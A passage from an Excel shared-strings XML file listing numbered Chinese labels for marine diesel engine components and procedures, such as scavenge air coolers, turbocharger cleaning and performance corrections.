      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>52+85</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5440-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5445-0201 VT </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5445-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气旁通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱灭火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器水洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0126 VT </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0131 VT </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0136 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5455-0141 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统电子图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气冷却器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气冷却器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气蝶阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气蝶阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0700 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5465-0701 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5470-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5470-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>5470-0110</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5470-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器起吊工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>5470-0120</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器提升</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5470-0131 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>5470-0700</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5470-0901 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器管连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾分离器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0350 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0500 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0620 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0630 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0750 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0900 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0910 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">5472-0930 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管旁通</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>5MM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花纹板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6340-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>6345-0200 IMO Nox</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术案卷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0310 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>记录评估</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0320 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器，空冷器，清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0330 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0340 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机动力压力测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0350 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数纠正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0360 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器效率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6345-0370 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有效功率评估</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷曲线（仅螺旋桨）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0105 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷曲线（螺旋桨整体）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观测性能</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0115 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热静态</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0125 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机有效压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0135 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器有效压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0140 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器压缩比</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0145  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器对照表格</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0145 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器进口温度</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油耗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0155 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>6355-0180 ISO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正条件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0185 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排温修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0190 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩压力修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0195 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气压力修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟量修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0205 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩效率计算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0210 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压效率计算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0215 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率评估</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6355-0220 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩轮直径</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6640-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6640-011 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备车期间检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动前准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0120 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6645-0130 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
